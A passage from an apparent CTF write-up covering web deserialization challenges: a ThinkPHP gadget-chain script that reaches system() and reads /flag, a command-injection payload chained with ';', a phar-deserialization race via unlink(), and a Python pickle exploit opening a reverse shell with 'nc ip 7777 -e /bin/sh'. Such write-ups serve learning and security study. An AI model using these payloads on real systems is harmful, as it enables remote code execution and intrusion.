        'var_method' => '_method',           // variable used to spoof the form request method
        'var_ajax' => '_ajax',               // variable used to spoof an ajax request
        'var_pjax' => '_pjax',               // variable used to spoof a pjax request
        'var_pathinfo' => 's',               // PATHINFO variable name (compatibility mode)
        'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'], // PATH_INFO fallbacks
        'default_filter' => '',              // default global filter(s), comma separated
        'url_domain_root' => '',             // domain root, e.g. thinkphp.cn
        'https_agent_name' => '',            // HTTPS proxy marker
        'http_agent_ip' => 'HTTP_X_REAL_IP', // header carrying the proxied client IP
        'url_html_suffix' => 'html',         // pseudo-static URL suffix
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}
namespace think\process\pipes;
use think\model\Pivot;
class Windows
{
    private $files = [];
    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));

payload:

?data=[base64 output of the script above]&shell=cat /flag

WEB-275

This one is a logic bug. At first I thought the key was copy($_GET['fn'],md5(mt_rand()).'.txt');

The challenge copies our webshell into a file with a random name and then deletes our file.

My original idea was to use a redirect before it deletes our file and read the flag into another file; that didn't work, apparently no permission.

After a look at the wp it turned out to be a pure logic problem: the destructor passes our input into system(), so just chain a command onto it.

payload:

?fn=;cat f*
post:flag=1

WEB-276 (phar deserialization)

This challenge adds an admin flag: to reach the system() call in the destructor you have to change admin.

That means deserialization, but the challenge gives us no unserialize() call.

The wp shows it is done through phar.

First upload a file whose content is a phar archive carrying our malicious serialized metadata. This is a fixed format I have summarised before, so I won't repeat it here.

My biggest question at first was that our upload only gets deserialized when it is accessed through the phar:// wrapper, so where is phar:// used?

After some more digging: after the upload, the script deletes our uploaded file with unlink(), and unlink() is exactly one of the file functions that deserializes phar metadata when handed a phar:// path.

So this needs a race: one request keeps uploading the phar with the serialized payload, another keeps requesting the uploaded file through phar://.

Whether it was something I did wrong or the challenge environment, neither my own requests nor other people's pocs ever succeeded for me. Understanding the method is what matters; the idea is the key.

The affected functions are these:

[image: table of file functions that trigger phar deserialization]

Taken from: https://paper.seebug.org/680/

WEB-277, 288 (Python)

Plain deserialization.

Looking at the source: #--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m)

EXP:

import base64
import pickle

# server side: /backdoor?data=...  ->  m=base64.b64decode(data); m=pickle.loads(m)
class EXP():
    def __reduce__(self):
        # pickle.loads() rebuilds the object by calling eval() on this string
        return (eval, ("__import__('os').popen('nc ip 7777 -e /bin/sh')",))

exp = EXP()
a = pickle.dumps(exp)
print(base64.b64encode(a).decode())

Closing notes:

With that I'm about to move on to the Java module, which of course means starting to learn Java! Let's go.